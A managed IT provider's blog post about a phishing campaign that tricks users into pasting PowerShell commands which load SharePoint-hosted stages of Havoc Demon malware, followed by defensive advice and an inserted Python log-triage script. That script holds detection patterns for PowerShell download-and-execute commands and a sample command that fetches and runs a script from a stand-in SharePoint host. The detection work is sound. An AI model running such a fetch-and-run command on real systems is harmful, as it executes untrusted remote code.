The Latest Hack: The SharePoint Security Threat You Didn’t See Coming
A new phishing scam is making the rounds, and this time it combines phishing with malware hosted on SharePoint to bypass security software. Read on to learn how this attack works and how to keep your business safe from data breach threats.
The Hack
Like many phishing scams, it starts with an email. In this instance, the email contains an HTML attachment that displays a fake error message when opened. The message provides “instructions” to fix the supposed issue, directing users to copy and run a malicious PowerShell command.
Wait, What’s PowerShell?
PowerShell is a built-in Windows tool that IT pros use to run commands and manage systems. Think of it like the control room of your computer – it gives direct access to important settings and operations. In the right hands, it’s a powerful IT tool, but if misused, it can cause serious damage. That’s why hackers try to trick people into running dangerous commands without realizing it – a social engineering method known as the ClickFix Technique.
How Does SharePoint Fit In?
Once the malicious command is executed, it downloads and runs a PowerShell script – a short program – hosted on a hacker-controlled SharePoint site. This script checks for cybersecurity solutions before proceeding. If the coast is clear, it then downloads another program that allows it to run yet another script from the same SharePoint site. This final script installs and launches malware known as Havoc Demon. From there, Havoc Demon allows attackers to steal sensitive files, move through a company’s network, and even run more malicious code remotely.
SharePoint is playing a critical role here as the hackers are craftily using this Microsoft service to host each stage of their malware. Because SharePoint is trusted by many security tools, this connection won’t immediately raise any red flags – allowing the code to be installed on your computer without detection. Once this happens, Havoc is deployed through SharePoint, and just like that, the hackers have control of your system.
How Does this Affect Small and Medium-Sized Businesses?
Many businesses rely on Microsoft 365, SharePoint, and PowerShell, making this attack especially effective. The initial phishing method aims to blend in with normal activity, and because the malware is downloaded through SharePoint, it’s harder to detect. If even one employee falls for this, it could expose sensitive company and customer data, give attackers a foothold in your network, and potentially lead to ransomware deployment across your business.
What Can You Do?
To help avoid potential attacks through trusted software, IT teams should do the following:
- Restrict external SharePoint file access to prevent unauthorized file sharing.
- Keep software up to date – this attack specifically checks for weak security measures, so strong, updated defenses make a big difference.
- Monitor unusual SharePoint activity to catch suspicious behavior early.
- Block PowerShell execution for non-administrative users.
- Never copy and paste commands from an email or an unknown file – if you don’t fully understand what it does, don’t run it.
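For the monitoring item above, here is one way to triage process-creation logs for the pattern this attack relies on: PowerShell fetching content from a SharePoint tenant that is not your own. This is an added example, not code from the original article. It assumes events have already been exported as dicts with `image` and `command_line` fields, uses placeholder tenant names, and runs over constructed sample events.

```python
import re
from urllib.parse import urlparse

# Assumption: placeholder host names standing in for your own SharePoint tenant.
TRUSTED_TENANTS = {"examplecorp.sharepoint.com", "examplecorp-my.sharepoint.com"}

POWERSHELL = re.compile(r"(?i)\b(powershell|pwsh)\b")
URL = re.compile(r"""(?i)https?://[^\s'"`)]+""")
# Built-in PowerShell/.NET ways to fetch remote content, and to run text as code.
FETCH = re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b")
EXEC = re.compile(r"(?i)\b(iex|invoke-expression)\b")
LEVELS = ["none", "low", "medium", "high"]

def sharepoint_hosts(cmdline):
    """Hosts under sharepoint.com referenced by URLs on a command line."""
    hosts = {(urlparse(u).hostname or "").lower() for u in URL.findall(cmdline)}
    return {h for h in hosts if h.endswith(".sharepoint.com")}

def assess(event):
    """Score one process-creation event; returns (level, reasons)."""
    cmd = event.get("command_line", "")
    if not POWERSHELL.search(event.get("image", "") + " " + cmd):
        return "none", []
    hosts = sharepoint_hosts(cmd)
    if not hosts or not FETCH.search(cmd):
        return "none", []
    score, reasons = 1, ["PowerShell fetches content from SharePoint"]
    external = sorted(hosts - TRUSTED_TENANTS)
    if external:
        score += 1
        reasons.append("tenant not on allow-list: " + ", ".join(external))
    if EXEC.search(cmd):
        score += 1
        reasons.append("command line also uses Invoke-Expression")
    return LEVELS[score], reasons

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -c "iex (iwr https://example-unknown.sharepoint.com/sites/docs/fix.ps1)"'},
    {"image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": r'pwsh -c "Invoke-WebRequest https://examplecorp.sharepoint.com/sites/it/report.csv -OutFile report.csv"'},
    {"image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "command_line": r"msedge.exe https://example-unknown.sharepoint.com/sites/docs"},
]

if __name__ == "__main__":
    print([assess(e) for e in SAMPLE_EVENTS])
```

The allow-list is what separates routine administrative downloads from your own tenant (scored low) from a fetch against an unfamiliar tenant, which is the case worth an analyst's attention.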
If your business has already been affected, it’s crucial to act fast: isolate infected systems, reset compromised credentials, and report the incident to cybersecurity professionals.
How an MSP Can Help
Alternatively, partnering with a trusted MSP like us means teaming up with security experts who have both the resources and expertise to deal with threats just like this one. Having an MSP in your corner means not having to worry (as much) about security threats, while having someone to handle your security updates.
Moral of the Story
Phishing attacks are evolving, and the latest ClickFix scam takes things to a new level. By tricking users into running malicious code themselves and exploiting SharePoint’s security trust, hackers have created a dangerous new threat.
That’s why you need to stay vigilant, keep security software updated, and work with experts who can keep you safe. If you’re worried about your company’s security, give us a call. Together, we can keep the hackers at bay.
About The 20 MSP
As a leading provider of managed IT services, The 20 MSP serves thousands of businesses nationwide, including single and multi-location organizations, delivering white-glove service, secure and streamlined IT infrastructure, and 24/7/365 support. We believe in building lasting relationships with clients founded on trust, communication, and the delivery of high-value services for a fair and predictable price. Our clients’ success is our success, and we are committed to helping each and every organization we serve leverage technology to secure a competitive advantage and achieve new growth. To learn more, visit the20msp.com.